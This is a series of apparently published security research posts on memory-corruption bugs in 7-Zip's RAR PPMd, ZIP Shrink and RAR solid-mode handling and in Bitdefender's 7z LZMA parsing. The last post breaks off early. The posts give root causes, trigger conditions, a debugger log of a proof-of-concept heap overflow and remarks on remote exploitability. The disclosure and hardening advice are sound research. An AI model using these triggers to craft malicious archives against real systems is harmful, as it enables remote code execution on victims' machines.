7-Zip: Multiple Memory Corruptions via RAR and ZIP


In the following, I will outline two bugs that affect 7-Zip before version 18.00 as well as p7zip. The first one (RAR PPMd) is the more critical and the more involved one. The second one (ZIP Shrink) seems to be less critical, but also much easier to understand.

Memory Corruptions via RAR PPMd (CVE-2018-5996)

7-Zip’s RAR code is mostly based on a recent UnRAR version. For version 3 of the RAR format, PPMd can be used, which is an implementation of the PPMII compression algorithm by Dmitry Shkarin. If you want to learn more about the details of PPMd and PPMII, I’d recommend Shkarin’s paper “PPM: one step to practicality” [1].

Interestingly, the 7z archive format can be used with PPMd as well, and 7-Zip uses the same code that is used for RAR3. As a matter of fact, this is the very PPMd implementation that was used by Bitdefender in a way that caused a stack based buffer overflow.

In essence, this bug is due to improper exception handling in 7-Zip’s RAR3 handler. In particular, one might argue that it is not a bug in the PPMd code itself or in UnRAR’s extraction code.

The Bug

The RAR handler has a function NArchive::NRar::CHandler::Extract [2] containing a loop that looks roughly as follows (heavily simplified!):

for (unsigned i = 0;; i++, /*OMITTED: unpack size updates*/) {
  //OMITTED: retrieve i-th item and setup input stream
  CMyComPtr<ICompressCoder> commonCoder;
  switch (item.Method) {
    case '0':
      commonCoder = copyCoder;
      break;
    case '1':
    case '2':
    case '3':
    case '4':
    case '5': {
      // Reuse the coder that was already created for this unpack version, if any.
      unsigned m;
      for (m = 0; m < methodItems.Size(); m++)
        if (methodItems[m].RarUnPackVersion == item.UnPackVersion) { break; }
      if (m == methodItems.Size()) { m = methodItems.Add(CreateCoder(/*OMITTED*/)); }
      //OMITTED: solidness check
      commonCoder = methodItems[m].Coder;
      break;
    }
  }
  HRESULT result = commonCoder->Code(inStream, outStream, &packSize, &outSize, progress);
  //OMITTED: encryptedness, outsize and crc check

  if (result != S_OK) {
    // S_FALSE and E_NOTIMPL are only recorded; the loop continues with the next item.
    if (result == S_FALSE) { opRes = NExtract::NOperationResult::kDataError; }
    else if (result == E_NOTIMPL) { opRes = NExtract::NOperationResult::kUnsupportedMethod; }
    else { return result; }
  }
}

The important bit about this function is essentially that at most one coder is created for each RAR unpack version. If an archive contains multiple items that are compressed with the same RAR unpack version, those will be decoded with the same coder object.

Observe, moreover, that a call to the Code method can fail, returning the result S_FALSE, and the created coder will be reused for the next item anyway, given that the callback function does not catch this (it does not). So let us see where the error code S_FALSE may come from. The method NCompress::NRar3::CDecoder::Code [3] looks as follows (again simplified):

STDMETHODIMP CDecoder::Code(ISequentialInStream *inStream, ISequentialOutStream *outStream,
    const UInt64 *inSize, const UInt64 *outSize, ICompressProgressInfo *progress) {
  try {
    if (!inSize) { return E_INVALIDARG; }
    //OMITTED: allocate and initialize VM, window and bitdecoder
    _outStream = outStream;
    _unpackSize = outSize ? *outSize : (UInt64)(Int64)-1;
    return CodeReal(progress);
  }
  // The exception is turned into an error code; the decoder object and its state stay alive.
  catch(const CInBufferException &e)  { return e.ErrorCode; }
  catch(...) { return S_FALSE; }
}

The CInBufferException is interesting. As the name suggests, this exception may be thrown while reading from the input stream. It is not completely straightforward, but nevertheless easily possible to trigger the exception with a RAR3 archive item such that the error code is S_FALSE. I will leave it as an exercise for the interested reader to figure out the details of how this can be achieved.

Why is this interesting? Well, because in case RAR3 with PPMd is used this exception may be thrown in the middle of an update of the PPMd model, putting the soundness of the model state at risk. Recall that the same coder will be used for the next item even after a CInBufferException with error code S_FALSE has been thrown.

Note, moreover, that the RAR3 decoder holds the PPMd model state. A brief look at the method NCompress::NRar3::CDecoder::InitPPM [3] reveals that this model state is only reinitialized if an item explicitly requests it. This is a feature that allows keeping the same model with the collected probability heuristics between different items. But it also means that we can do the following:

  • Construct the first item of a RAR3 archive such that a CInBufferException with error code S_FALSE is thrown in the middle of a PPMd model update. Essentially, this means that we can let an arbitrary call to the Decode method of the range decoder used in Ppmd7_DecodeSymbol [4] fail, jumping out of the PPMd code.
  • The subsequent item of the archive does not have the reset bit set that would cause the model to be reinitialized. Hence, the PPMd code will operate on a potentially broken model state.
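To make the two steps above more tangible, here is a minimal sketch of the pattern. It is not 7-Zip code: ToyModel, ToyInput, DecodeSymbol and DecodeItem are hypothetical names, and the "model" is reduced to two integers whose equality stands in for a sound state. The point is only that an exception thrown between two steps of an update leaves the state inconsistent, and that a later item without the reset bit inherits it.

```cpp
#include <cassert>
#include <cstddef>
#include <stdexcept>
#include <vector>

// Hypothetical stand-in for the PPMd model that the decoder keeps between items.
struct ToyModel {
    int minContext = 0;  // plays the role of p->MinContext
    int maxContext = 0;  // plays the role of p->MaxContext
    bool IsSound() const { return minContext == maxContext; }
};

// Hypothetical input stream that throws when it runs dry.
struct ToyInput {
    const std::vector<int> &bytes;
    std::size_t pos;
    int Read() {
        if (pos == bytes.size()) throw std::runtime_error("input exhausted");
        return bytes[pos++];
    }
};

// One symbol needs two reads; the invariant only holds again after the second one.
void DecodeSymbol(ToyModel &model, ToyInput &in) {
    model.minContext += in.Read();        // step 1: move to another context
    in.Read();                            // step 2: may throw in the middle of the update
    model.maxContext = model.minContext;  // step 3: update complete, invariant restored
}

// Same shape as the Code method: the exception becomes an error result,
// and the model is kept unless the item asks for a reset.
bool DecodeItem(ToyModel &model, const std::vector<int> &bytes, bool resetModel) {
    if (resetModel) model = ToyModel();
    ToyInput in{bytes, 0};
    try {
        while (in.pos != bytes.size()) DecodeSymbol(model, in);
        return true;
    } catch (const std::runtime_error &) {
        return false;  // error reported, but the half-updated model survives
    }
}
```

Decoding the single-element input {1} with a reset fails and leaves minContext != maxContext. A following call with resetModel == false then starts from exactly that state.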

So far this may not look too bad. In order to understand how this bug can be turned into attacker controlled memory corruptions, we need to understand a little bit more about the PPMd model state and how it is updated.

PPMd Preliminaries

The main idea of all PPM compression algorithms is to build a Markov model of some finite order D. In the PPMd implementation, the model state is essentially a 256-ary context tree of maximum depth D, in which the path from the root to the current context node is to be interpreted as a sequence of byte symbols. In particular, the parent relation is to be understood as a suffix relation. Additionally, every context node stores frequency statistics about possible successor symbols connected with a successor context node.

A context node is of type CPpmd7_Context, defined as follows:

typedef struct CPpmd7_Context_ {
  UInt16 NumStats;
  UInt16 SummFreq;
  CPpmd_State_Ref Stats;
  CPpmd7_Context_Ref Suffix;
} CPpmd7_Context;

The field NumStats holds the number of elements the Stats array contains [5]. The type CPpmd_State is defined as follows:

typedef struct {
  Byte Symbol;
  Byte Freq;
  UInt16 SuccessorLow;
  UInt16 SuccessorHigh;
} CPpmd_State;

So far, so good. Now what about the model update? I will spare you the details, describing only abstractly how a new symbol is decoded [6]:

  • When Ppmd7_DecodeSymbol is called, the current context is p->MinContext, which is equal to p->MaxContext, assuming a sound model state.
  • A threshold value is read from the range decoder. This value is used to find a corresponding symbol in the Stats array of the current context p->MinContext.
  • If no corresponding symbol can be found, p->MinContext is moved up the tree (following the suffix links) until a context with a (strictly) larger Stats array is found. Then, a new threshold is read and used to find a corresponding value in the current Stats array, ignoring the symbols of the contexts that have been previously visited. This process is repeated until a value is found.
  • Finally, the range decoder’s decode method is called, the found state is written to p->FoundState, and one of the Ppmd7_Update functions is called to update the model. As a part of this process, the UpdateModel function adds the found symbol to the Stats array of each context between p->MaxContext and p->MinContext (exclusively).

One of the key invariants the update mechanism tries to establish is that the Stats array of every context contains each of the 256 symbols at most once. However, this property only follows inductively, since there is no explicit duplicate check when a new symbol is inserted [7]. With the bug described above, it is easy to see how we can add duplicate symbols to Stats arrays:

  • The first RAR3 item is created such that a few context nodes are created, and the function Ppmd7_DecodeSymbol then moves p->MinContext up the tree at least once, until the corresponding symbol is found. Then, the subsequent call to the range decoder’s decode method fails with a CInBufferException.
  • The next RAR3 item does not have the reset bit set, so that we can continue with the previously created PPMd model.
  • The Ppmd7_DecodeSymbol function is entered with a fresh range decoder and p->MinContext != p->MaxContext. It finds the corresponding symbol immediately in p->MinContext. However, this symbol may now be one that already occurs in the contexts between p->MaxContext and p->MinContext. When the UpdateModel function is called, this symbol is added as a duplicate to the Stats array to each context between p->MaxContext and p->MinContext (exclusively).
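The invariant in question is cheap to state in code. The following sketch uses a hypothetical ToyContext that keeps only the symbols of a Stats array. AddSymbolUnchecked mirrors an insertion without a duplicate check, and HasUniqueSymbols is the kind of check a hardened implementation could run. Neither function exists in 7-Zip.

```cpp
#include <array>
#include <cassert>
#include <cstdint>
#include <vector>

// Hypothetical simplified context: only the symbols of its Stats array.
struct ToyContext {
    std::vector<std::uint8_t> stats;
};

// Appends the symbol without looking for an existing entry, so uniqueness
// holds only as long as every caller respects the model invariants.
void AddSymbolUnchecked(ToyContext &ctx, std::uint8_t symbol) {
    ctx.stats.push_back(symbol);
}

// Hardening check: true if every symbol occurs at most once.
bool HasUniqueSymbols(const ToyContext &ctx) {
    std::array<bool, 256> seen{};
    for (std::uint8_t s : ctx.stats) {
        if (seen[s]) return false;
        seen[s] = true;
    }
    return true;
}
```

Adding 'a', 'b' and then 'a' again yields a three-element array for which HasUniqueSymbols returns false, which is the situation the second RAR3 item creates.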

Okay, so now we know how to add duplicate symbols into the Stats array. Let us see how we can make use of this to cause an actual memory corruption.

Triggering a Stack Buffer Overflow

The following code is run as a part of Ppmd7_DecodeSymbol to move the p->MinContext pointer up the context tree:

CPpmd_State *ps[256];
unsigned numMasked = p->MinContext->NumStats;
do {
  if (!p->MinContext->Suffix) { return -1; }
  p->MinContext = Ppmd7_GetContext(p, p->MinContext->Suffix);
} while (p->MinContext->NumStats == numMasked);
UInt32 hiCnt = 0;
CPpmd_State *s = Ppmd7_GetStats(p, p->MinContext);
unsigned i = 0;
unsigned num = p->MinContext->NumStats - numMasked;
do {
  int k = (int)(MASK(s->Symbol));
  hiCnt += (s->Freq & k);
  ps[i] = s++;
  i -= k;
} while (i != num);

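MASK is a macro that accesses a byte array which holds the value 0x00 at the index of each masked symbol, and the value 0xFF otherwise. Since the macro reads these bytes as signed values, k is either 0 or -1, so s->Freq & k yields either 0 or the frequency, and i -= k advances i only for unmasked symbols. Clearly, the intention is to fill the stack buffer ps with pointers to all unmasked symbol states.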

Observe that the stack buffer ps has a fixed size of 256 and there is no overflow check. This means that if the Stats array contains a masked symbol multiple times, we can access the array out of bound and overflow the ps buffer.

Usually, such out of bound buffer reads make exploitation very difficult, because one cannot easily control the memory that is read. However, this is no issue in the case of PPMd, because the implementation allocates only one large pool on the heap, and then makes use of its own memory allocator to allocate all context and state structs within this pool. This ensures very quick allocation and a low memory usage, but it also allows an attacker to control the out of bound read to structures within this pool very reliably and independently of the system’s heap implementation. For example, the first RAR3 item can be constructed such that the pool is filled with the desired data, avoiding uninitialized out of bound reads.

Finally, note that the attacker can overflow the stack buffer with pointers to data that is highly attacker controlled itself.
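For comparison, here is a sketch of how the collection loop could look with the two missing checks. All names (ToyState, CollectUnmasked, kMaxSymbols) are made up for this illustration, and the Stats array is modelled as a std::vector so that its length is known. The real code works on raw pointers into the PPMd pool and has no such length at hand.

```cpp
#include <array>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

constexpr std::size_t kMaxSymbols = 256;

// Hypothetical reduced version of CPpmd_State.
struct ToyState {
    std::uint8_t symbol;
    std::uint8_t freq;
};

// Collects pointers to the `expected` unmasked states of `stats` into `ps`.
// Returns false instead of writing past `ps` or reading past `stats`.
bool CollectUnmasked(const std::vector<ToyState> &stats,
                     const std::array<bool, kMaxSymbols> &masked,
                     std::size_t expected,
                     std::array<const ToyState *, kMaxSymbols> &ps) {
    if (expected > kMaxSymbols) return false;    // would overflow ps
    std::size_t i = 0;
    std::size_t next = 0;
    while (i != expected) {
        if (next == stats.size()) return false;  // would read past the Stats array
        const ToyState &s = stats[next++];
        if (!masked[s.symbol]) ps[i++] = &s;
    }
    return true;
}
```

With a sound array {A, B, C} and A masked, two states are collected. With the broken array {A, A, B} and the same mask, the loop still expects two unmasked states (3 - 1), finds only one, and the unchecked original would keep reading behind the array.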

Triggering a Heap Buffer Overflow

Building on the previous section, we now want to corrupt the heap. Perhaps not surprisingly, it is also possible to read the Stats array out of bounds without overflowing the stack buffer ps. This allows us to let s point to a CPpmd_State with attacker controlled data. This matters because p->FoundState may be one of the ps states, and the model updating process assumes that the Stats array of p->MinContext as well as those of its suffix contexts contain the symbol p->FoundState->Symbol.

This code fragment is part of the function UpdateModel:

do { s++; } while (s->Symbol != p->FoundState->Symbol);
if (s[0].Freq >= s[-1].Freq) {
  SwapStates(&s[0], &s[-1]);
}

Again, there is no bound check on the Stats array, so the pointer s can easily be moved past the end of the allocated heap buffer. Ideally, we would construct our input such that s is out of bounds and s-1 is within the allocated pool, allowing an attacker controlled heap corruption.

On Attacker Control, Exploitation and Mitigation

The 7-Zip binaries for Windows are shipped with neither the /NXCOMPAT nor the /DYNAMICBASE flags. This means effectively that 7-Zip runs without ASLR on all Windows systems, and DEP is only enabled on Windows x64 or on Windows 10 x86. For example, the following screenshot shows the most recent 7-Zip 18.00 running on a fully updated Windows 8.1 x86:

[Screenshot: 7-Zip 18.00 in Process Explorer on Windows 8.1 x86]

Moreover, 7-Zip is compiled without /GS flag, so there are no stack canaries.

Since there are various ways to corrupt the stack and the heap in highly attacker controlled ways, exploitation for remote code execution is straightforward, especially if no DEP is used.

I have discussed this issue with Igor Pavlov and tried to convince him to enable all three flags. However, he refused to enable /DYNAMICBASE because he prefers to ship the binaries without relocation table to achieve a minimal binary size. Moreover, he doesn’t want to enable /GS, because it could affect the runtime as well as the binary size. At least he will try to enable /NXCOMPAT for the next release. Apparently, it is currently not enabled because 7-Zip is linked with an obsolete linker that doesn’t support the flag.


The outlined heap and stack memory corruptions are only scratching the surface of possible exploitation paths. Most likely there are many other and possibly even neater ways of causing memory corruptions in an attacker controlled fashion.

This bug demonstrates again how difficult it can be to integrate external code into an existing code base. In particular, handling exceptions correctly and understanding the control flow they induce can be challenging.

In the post about Bitdefender’s PPMd stack buffer overflow, I already made clear that the PPMd code is very fragile. A slight misuse of its API, or a tiny mistake while integrating it into another code base may lead to multiple dangerous memory corruptions.

If you use Shkarin’s PPMd implementation, I would strongly recommend you to harden it by adding out of bound checks wherever possible, and to make sure the basic model invariants always hold. Moreover, in case exceptions are used, one could add an additional error flag to the model that is set to true before updating the model, and only set to false after the update has been successfully completed. This should significantly mitigate the danger of corrupting the model state.
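The error flag idea can be sketched in a few lines. GuardedModel, UpdateModel, DecodeSymbolGuarded and ResetModel are hypothetical names, and the model state is reduced to a counter. This only shows the control flow of the mitigation and is not a patch for the real PPMd code.

```cpp
#include <cassert>
#include <stdexcept>

// Hypothetical model with the additional error flag.
struct GuardedModel {
    bool updateInProgress = false;  // true while an update is running, or after one was aborted
    int symbolsSeen = 0;            // stands in for the real model state
};

// Hypothetical update step that throws if the input fails midway.
void UpdateModel(GuardedModel &model, bool inputFails) {
    model.updateInProgress = true;   // set before touching the model
    if (inputFails) throw std::runtime_error("input exhausted");
    ++model.symbolsSeen;
    model.updateInProgress = false;  // cleared only after a complete update
}

// Refuses to work on a model that was left half-updated.
bool DecodeSymbolGuarded(GuardedModel &model, bool inputFails) {
    if (model.updateInProgress) return false;
    try {
        UpdateModel(model, inputFails);
        return true;
    } catch (const std::runtime_error &) {
        return false;  // the flag stays set, so later calls are rejected
    }
}

// Only a full reinitialization makes the model usable again.
void ResetModel(GuardedModel &model) { model = GuardedModel(); }
```

After one failed update, every further call to DecodeSymbolGuarded returns false until ResetModel is called. For an archive, this corresponds to rejecting all following items that do not request a model reset.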

ZIP Shrink: Heap Buffer Overflow (CVE-2017-17969)

Let us proceed by discussing the other bug, which concerns ZIP Shrink. Shrink is an implementation of the Lempel-Ziv-Welch (LZW) [8] compression algorithm. It has been used by PKWARE’s PKZIP before version 2.0, which was released in 1993 (sic!). In fact, shrink is so old and so rarely used that already in 2005, when Igor Pavlov wrote 7-Zip’s shrink decoder, he had a hard time [9] finding sample archives to test the code.

In essence, shrink is LZW with a dynamic code size between 9 and 13 bits, and a special feature that allows partially clearing the dictionary.

7-Zip’s shrink decoder is quite straightforward and easy to understand. In fact, it consists of only 200 lines of code. Nevertheless, it contains a buffer overflow bug.

The Bug

The shrink model’s state essentially only consists of the two arrays _parents and _suffixes, which store the LZW dictionary in a space efficient way. Moreover, there is a buffer _stack to which the current sequence is written:

  UInt16 _parents[kNumItems];
  Byte _suffixes[kNumItems];
  Byte _stack[kNumItems];

The following code fragment is part of the method NCompress::NShrink::CDecoder::CodeReal [10]:

unsigned cur = sym;
unsigned i = 0;
while (cur >= 256) {
  _stack[i++] = _suffixes[cur];
  cur = _parents[cur];
}

Observe that there is no bound check on the value of i.

One way this can be exploited to overflow the heap buffer _stack is by constructing a sequence of symbols such that the _parents array forms a cycle. This is possible, because the decoder only ensures that a parent node does not link to itself (cycle of length one). Interestingly, the old versions of PKZIP create shrink archives that may contain such self-linked parents, so a compatible implementation should actually accept this (7-Zip 18.00 fixes this).

Moreover, using the special symbol sequence 256,2 one can clear parent nodes in an attacker controlled fashion. A cleared parent node will be set to kNumItems. Since there is no check whether a parent has been cleared or not, the parents array can be accessed out of bound.

This sounds promising, and it is actually possible to construct archives that make the decoder write attacker controlled data out of bound. However, I didn’t find an easy way to do so without ending up in an infinite loop. This matters, because the index i is increased in every iteration of the loop. Hence, an infinite loop will quickly lead to a segmentation fault, making exploitation for code execution very difficult (if not impossible). However, I didn’t spend too much time on this, so maybe it is possible to corrupt the heap without entering an infinite loop after all.
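A bounded version of the unwinding loop could look like the following sketch. ToyShrinkState and UnwindChecked are hypothetical names. The value 1 << 13 for kNumItems is an assumption derived from the 13-bit maximum code size mentioned above, and the sketch is not meant to reproduce the actual fix in 7-Zip 18.00.

```cpp
#include <array>
#include <cassert>
#include <cstdint>

constexpr unsigned kNumItems = 1u << 13;  // assumed: one entry per 13-bit code

// Hypothetical copy of the decoder state described above.
struct ToyShrinkState {
    std::array<std::uint16_t, kNumItems> parents{};
    std::array<std::uint8_t, kNumItems> suffixes{};
    std::array<std::uint8_t, kNumItems> stack{};
};

// Unwinds the dictionary chain starting at `sym` into `stack`.
// Returns the number of bytes written, or -1 for a malformed dictionary.
int UnwindChecked(ToyShrinkState &st, unsigned sym) {
    unsigned cur = sym;
    unsigned i = 0;
    while (cur >= 256) {
        if (cur >= kNumItems) return -1;  // cleared parent (kNumItems) or out of range
        if (i >= kNumItems) return -1;    // longer than the dictionary: must be a cycle
        st.stack[i++] = st.suffixes[cur];
        cur = st.parents[cur];
    }
    return static_cast<int>(i);
}
```

A two-node cycle such as parents[400] = 401 and parents[401] = 400 makes the unchecked loop run forever while i keeps growing. Here the walk is cut off after kNumItems steps.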

Bitdefender: Heap Buffer Overflow via 7z LZMA


For the write-up on the 7z PPMD bug, I read a lot of the original 7-Zip source code and discovered a few new things that looked promising to investigate in anti-virus products. Therefore, I took another stab at analyzing Bitdefender’s 7z module.

I previously wrote about relaxed file processing. The Bitdefender 7z PPMD stack buffer overflow [1] was a good example of relaxed file processing by removing a check (that is, removing code).

This bug demonstrates another fundamental difficulty that arises when incorporating new code into an existing code base. In particular, a minimal set of changes to the new code is often inevitable. Mostly, this affects memory allocation and code that is concerned with file access, especially if a totally different file abstraction is used. The presented bug is an example of the former type of difficulty. More specifically, an incorrect use of a memory allocation function that extends the 7-Zip source code in Bitdefender’s 7z module causes a heap buffer overflow.

Getting Into the Details

When Bitdefender’s 7z module discovers an EncodedHeader [3] in a 7z archive, it tries to decompress it with the LZMA decoder. Their code seems to be based on 7-Zip, but they made a few changes. Loosely speaking, the extraction of a 7z EncodedHeader is implemented as follows:

  1. Read the unpackSize from the 7z EncodedHeader.
  2. Allocate unpackSize bytes.
  3. Use the C API of the LZMA decoder that comes with 7-Zip and let it decompress the stream.

The following snippet shows how the allocation function is called:

1DD02A845FA lea     rcx, [rdi+128h] //<-------- result
1DD02A84601 mov     rbx, [rdi+168h]
1DD02A84608 mov     [rsp+128h], rsi
1DD02A84610 mov     rsi, [rax+10h]
1DD02A84614 mov     [rsp+0E0h], r15
1DD02A8461C mov     edx, [rsi]      //<-------- size
1DD02A8461E call    SZ_AllocBuffer

Recall the x64 calling convention. In particular, the first two integer arguments (from left to right) are passed via rcx and rdx.

SZ_AllocBuffer is a function within the Bitdefender 7z module. It has two arguments:

  • The first argument result is a pointer to which the result (a pointer to the allocated buffer in case of success or NULL in case of a failure) is written.
  • The second argument size is the allocation size.

Let us look at the function’s implementation.

260ED3025D0 SZ_AllocBuffer proc near
260ED3025D0 mov     [rsp+8], rbx
260ED3025D5 push    rdi
260ED3025D6 sub     rsp, 20h
260ED3025DA mov     rbx, rcx
260ED3025DD mov     edi, edx //<-------- edi holds size
260ED3025DF mov     rcx, [rcx]
260ED3025E2 test    rcx, rcx
260ED3025E5 jz      short loc_260ED3025EC
260ED3025E7 call    near ptr irrelevant_function
260ED3025EC loc_260ED3025EC:
260ED3025EC cmp     edi, 0FFFFFFFFh  //<------- {*}
260ED3025EF jbe     short loc_260ED302606
260ED3025F1 xor     ecx, ecx
260ED3025F3 mov     [rbx], rcx
260ED3025F6 mov     eax, ecx
260ED3025F8 mov     [rbx+8], ecx
260ED3025FB mov     rbx, [rsp+30h]
260ED302600 add     rsp, 20h
260ED302604 pop     rdi
260ED302605 retn
260ED302606 ; ------------------------------------
260ED302606 loc_260ED302606:                        
260ED302606 mov     rcx, rdi  //<------ set size argument for mymalloc
260ED302609 call    mymalloc
//[rest of the function omitted]

Note that mymalloc is just a wrapper function that eventually calls malloc and returns the result.

Apparently, the programmer expected the size argument of SZ_AllocBuffer to be of a type with size greater than 32 bits. Obviously, it is only a 32-bit value.

It is funny to see that the compiler failed to optimize away the comparison at {*}, given that its result is only used for an unsigned comparison jbe. If you have any hints on why this might happen, I’d be very interested to hear them.

After SZ_AllocBuffer returns, the function LzmaDecode is called:

LzmaDecode(Byte *dest, SizeT *destLen, const Byte *src, SizeT *srcLen, /* further arguments omitted */)

Note that dest is the buffer allocated with SZ_AllocBuffer and destLen is supposed to be a pointer to the buffer’s size.

In the reference implementation, SizeT is defined as size_t. Interestingly, Bitdefender’s 7z module uses a 64-bit type for SizeT in both the 32-bit and the 64-bit version, making both versions vulnerable to this bug. I suspect that this is the result of an effort to create identical behavior for the 32-bit and 64-bit versions of the engine.

The LZMA decoder extracts the given src stream and writes (up to) *destLen bytes to the dest buffer, where *destLen is the 64-bit unpackSize from the 7z EncodedHeader. This results in a neat heap buffer overflow.

Triggering the Bug

To trigger the bug, we create a 7z LZMA stream containing the data we want to write on the heap. Then, we construct a 7z EncodedHeader with a Folder that has an unpackSize of (1<<32) + 1. This should make the function SZ_AllocBuffer allocate a buffer of 1 byte.
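The arithmetic behind this is simply (2^32 + 1) mod 2^32 = 1. A small sketch that the compiler can check: TruncateTo32 and PassesOriginalCheck are hypothetical helpers that model the 32-bit size argument and the comparison at {*}, they are not functions from the Bitdefender module.

```cpp
#include <cassert>
#include <cstdint>

// Models a 64-bit size being passed through the 32-bit register edx.
constexpr std::uint32_t TruncateTo32(std::uint64_t size) {
    return static_cast<std::uint32_t>(size);  // only the low 32 bits survive
}

// The comparison at {*}, applied to a 32-bit value: it can never fail.
constexpr bool PassesOriginalCheck(std::uint32_t size) {
    return size <= 0xFFFFFFFFu;
}

// The unpackSize used to trigger the bug.
constexpr std::uint64_t kUnpackSize = (std::uint64_t{1} << 32) + 1;

static_assert(TruncateTo32(kUnpackSize) == 1, "the allocation request shrinks to one byte");
static_assert(PassesOriginalCheck(TruncateTo32(kUnpackSize)), "the size check is passed");
```

The decoder, on the other hand, still sees the full 64-bit value as *destLen, which is where the mismatch between allocation size and write size comes from.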

That sounds nice, but does this actually work?

0:000> g
!Heap block at 1F091472D40 modified at 1F091472D51 past requested size of 1
(2f8.14ec): Break instruction exception - code 80000003 (first chance)
00007ff9`d849c4ce cc              int     3

0:000> db 1F091472D51
000001f0`91472d51  59 45 53 2c 20 54 48 49-53 20 57 4f 52 4b 53 ab  YES, THIS WORKS.

Attacker Control and Exploitation

The attacker can write completely arbitrary data to the heap without any restriction. A file system minifilter is used to scan all files that touch the disk, making this vulnerability easily exploitable remotely, for example by sending an e-mail with a crafted file as attachment to the victim.

Moreover, the engine runs unsandboxed and as NT Authority\SYSTEM. Hence, this bug is highly critical. However, since ASLR and DEP are in place, successful exploitation for remote code execution might require another bug (e.g. an information leak) to bypass ASLR.

Note also that Bitdefender’s engine is licensed to many different anti-virus vendors, all of which could be affected by this bug.

The Fix

The patched version of the function SZ_AllocBuffer looks as follows:

1E0CEA52AE0 SZ_AllocBuffer proc near
1E0CEA52AE0 mov     [rsp+8], rbx
1E0CEA52AE5 mov     [rsp+10h], rsi
1E0CEA52AEA push    rdi
1E0CEA52AEB sub     rsp, 20h
1E0CEA52AEF mov     esi, 0FFFFFFFFh
1E0CEA52AF4 mov     rdi, rdx  //<-----rdi holds the size
1E0CEA52AF7 mov     rbx, rcx
1E0CEA52AFA cmp     rdx, rsi  //<------------{1}
1E0CEA52AFD jbe     short loc_1E0CEA52B11
1E0CEA52AFF xor     eax, eax
1E0CEA52B01 mov     rbx, [rsp+30h]
1E0CEA52B06 mov     rsi, [rsp+38h]
1E0CEA52B0B add     rsp, 20h
1E0CEA52B0F pop     rdi
1E0CEA52B10 retn
1E0CEA52B11 ; -----------------------------------
1E0CEA52B11 loc_1E0CEA52B11: 
1E0CEA52B11 mov     rcx, [rcx]
1E0CEA52B14 test    rcx, rcx
1E0CEA52B17 jz      short loc_1E0CEA52B1E
1E0CEA52B19 call    near ptr irrelevant_function
1E0CEA52B1E loc_1E0CEA52B1E: 
1E0CEA52B1E cmp     edi, esi  //<------------{2}
1E0CEA52B20 jbe     short loc_1E0CEA52B29
1E0CEA52B22 xor     ecx, ecx
1E0CEA52B24 mov     [rbx], rcx
1E0CEA52B27 jmp     short loc_1E0CEA52B3B
1E0CEA52B29 ; -----------------------------------
1E0CEA52B29 loc_1E0CEA52B29:
1E0CEA52B29 mov     ecx, edi
1E0CEA52B2B call    near ptr mymalloc
//[rest of the function omitted]

Most importantly, we see that the function’s second argument size has been changed to a 64-bit type.

Note that at {1}, a check ensures that the passed size is not greater than 0xFFFFFFFF.

At {2}, the value of rdi is guaranteed to be at most 0xFFFFFFFF, hence it suffices to use the 32-bit register edi. However, just as in the original version (see above), it is useless to compare this 32-bit value once more to 0xFFFFFFFF and it is a mystery to me why the compiler does not optimize this away.

Using a full 64-bit type for the second argument size resolves the described bug.
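In C++ terms, the essence of the patched function might look like the following sketch. AllocBufferChecked is a hypothetical name, and its signature and return convention are my assumptions. It only mirrors check {1} and the subsequent allocation, not the rest of the disassembly.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstdlib>

// Hypothetical reconstruction: the size is taken as a full 64-bit value and
// rejected before any narrowing takes place.
bool AllocBufferChecked(void **result, std::uint64_t size) {
    *result = nullptr;
    if (size > 0xFFFFFFFFull) return false;  // corresponds to check {1}
    *result = std::malloc(static_cast<std::size_t>(size));  // narrowing is safe after the check
    return *result != nullptr;
}
```

With this shape, a request for (1 << 32) + 1 bytes fails instead of silently turning into a 1-byte allocation.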


In a nutshell, the discovered bug is a 64-bit value size being passed to the allocation function SZ_AllocBuffer which looks roughly like this [4]:

void* SZ_AllocBuffer(void *resultptr, uint32_t size);

Assuming that the size is not explicitly cast, the compiler should emit a warning of the following kind:

warning C4244: 'argument': conversion from 'uint64_t' to 'uint32_t', possible loss of data

Note that in Microsoft’s MSVC compiler, this is a Level2 warning (Level1 being the lowest and Level4 being the highest level). Hence, this bug most likely could have been avoided simply by taking compiler warnings seriously.

For a critical codebase such as the engine of an anti-virus product, it would be adequate to treat warnings as errors, at least up to a warning level of 2 or 3.

Nevertheless, the general type of bug shows that even if only few lines of additional code are necessary to incorporate external code (such as the 7-Zip code) into a code base, those very lines can be particularly prone to error.


7-Zip: From Uninitialized Memory to Remote Code Execution


7-Zip’s RAR code is mostly based on a recent UnRAR version, but especially the higher-level parts of the code have been heavily modified. As we have seen in some of my earlier blog posts, the UnRAR code is very fragile. Therefore, it is hardly surprising that any changes to this code are likely to introduce new bugs.

Very abstractly, the bug can be described as follows: The initialization of some member data structures of the RAR decoder classes relies on the RAR handler to configure the decoder correctly before decoding something. Unfortunately, the RAR handler fails to sanitize its input data and passes the incorrect configuration into the decoder, causing usage of uninitialized memory.

Now you may think that this sounds harmless and boring. Admittedly, this is what I thought when I first discovered the bug. Surprisingly, it is anything but harmless.

In the following, I will outline the bug in more detail. Then, we will take a brief look at 7-Zip’s patch. Finally, we will see how the bug can be exploited for remote code execution.

The Bug (CVE-2018-10115)

This new bug arises in the context of handling solid compression. The idea of solid compression is simple: Given a set of files (e.g., from a folder), we can interpret them as the concatenation to one single data block, and then compress this whole block (as opposed to compressing every file for itself). This can yield a higher compression rate, in particular if there are many files that are somewhat similar.

In the RAR format (before version 5), solid compression can be used in a very flexible way: Each item (representing a file) of the archive can be marked as solid, independently from all other items. The idea is that if an item is decoded that has this solid bit set, the decoder would not reinitialize its state, essentially continuing from the state of the previous item.

Obviously, one needs to make sure that the decoder object initializes its state at the beginning (for the first item it is decoding). Let us have a look at how this is implemented in 7-Zip. The RAR handler has a method NArchive::NRar::CHandler::Extract [1] that contains a loop which iterates with a variable index over all items. In this loop, we can find the following code:

Byte isSolid = (Byte)((IsSolid(index) || item.IsSplitBefore()) ? 1: 0);
if (solidStart) {
  isSolid = 0;
  solidStart = false;
}

RINOK(compressSetDecoderProperties->SetDecoderProperties2(&isSolid, 1));

The basic idea is to have a boolean flag solidStart, which is initialized to true (before the loop), making sure that the decoder is configured with isSolid==false for the first item that is decoded. Furthermore, the decoder will (re)initialize its state (before starting to decode) whenever it is called with isSolid==false.

